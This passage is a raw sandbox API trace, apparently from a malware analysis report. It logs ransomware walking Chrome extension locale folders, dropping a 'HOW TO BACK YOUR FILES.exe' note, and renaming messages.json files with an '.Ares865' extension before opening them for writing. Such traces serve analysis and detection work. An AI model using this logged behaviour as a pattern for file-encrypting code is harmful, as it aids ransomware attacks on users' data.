returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da" [0102.036] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da" [0102.036] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.036] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.036] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.037] GetLastError () returned 0x0 [0102.037] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.037] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e23760, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e893800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e893800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.037] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.037] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.037] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.037] lstrlenW (lpString="messages.json") returned 13 [0102.037] lstrlenW (lpString="Ares865") returned 7 [0102.037] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.038] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json.Ares865") returned 160 [0102.038] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.039] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.039] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=172) returned 1 [0102.045] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs" [0102.045] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs" [0102.045] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.045] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.046] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.046] GetLastError () returned 0x0 [0102.046] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.046] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e23760, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e893800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e893800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.046] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.046] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.046] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.046] lstrlenW (lpString="messages.json") returned 13 [0102.046] lstrlenW (lpString="Ares865") returned 7 [0102.046] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.047] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json.Ares865") returned 160 [0102.047] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.048] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.048] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=173) returned 1 [0102.051] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca" [0102.051] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca" [0102.051] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.051] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.052] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.052] GetLastError () returned 0x0 [0102.052] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.052] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85dfaef0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e8b9960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e8b9960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.052] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.052] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.053] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.053] lstrlenW (lpString="messages.json") returned 13 [0102.053] lstrlenW (lpString="Ares865") returned 7 [0102.053] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.053] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json.Ares865") returned 160 [0102.053] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.054] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.055] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=207) returned 1 [0102.058] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn" [0102.058] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn" [0102.058] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.058] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.059] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.059] GetLastError () returned 0x0 [0102.059] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.059] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85dfaef0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e8b9960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e8b9960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.059] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.059] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.060] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.060] lstrlenW (lpString="messages.json") returned 13 [0102.060] lstrlenW (lpString="Ares865") returned 7 [0102.060] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.060] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json.Ares865") returned 160 [0102.060] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.061] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.062] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=331) returned 1 [0102.064] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg" [0102.064] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg" [0102.065] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.065] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.065] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.065] GetLastError () returned 0x0 [0102.066] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.066] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85dfaef0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e8b9960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e8b9960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.066] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.066] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.066] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.066] lstrlenW (lpString="messages.json") returned 13 [0102.066] lstrlenW (lpString="Ares865") returned 7 [0102.066] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.066] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json.Ares865") returned 160 [0102.066] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.067] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json.Ares865" (normalized: 